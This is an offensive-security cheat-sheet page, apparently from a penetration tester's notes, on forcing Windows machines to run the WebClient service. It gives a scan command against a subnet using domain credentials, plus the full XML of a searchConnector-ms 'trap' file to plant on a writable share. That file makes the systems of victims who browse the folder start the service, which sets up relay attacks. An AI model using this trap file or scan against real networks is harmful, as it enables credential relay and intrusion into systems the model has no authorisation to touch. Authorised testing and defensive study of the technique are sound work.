#
webclientservicescanner
A cool tool for checking whether WebClient service is running.
#
Scan subnet for all machines running WebClient service
webclientservicescanner domain.com/low-priv:SecureP4$$turd@10.10.10.0/24
#
Net command to force a system to start WebClient service
We've got this documented on the net page.
#
"Trap" file to force systems to start the WebClient service on a victim system
Drop a file called something like Documents.searchConnector-ms on a file share you can write to, and put this in the contents of the file:
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<description>Microsoft Outlook</description>
<isSearchOnlyItem>false</isSearchOnlyItem>
<includeInStartMenuScope>true</includeInStartMenuScope>
<templateInfo>
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
</templateInfo>
<simpleLocation>
<url>https://mail.google.com/</url>
</simpleLocation>
</searchConnectorDescription>When users visit a directory with this file, their system will automatically start the WebClient service - even if the user isn't running as a local admin! More info about this attack in the farmer section.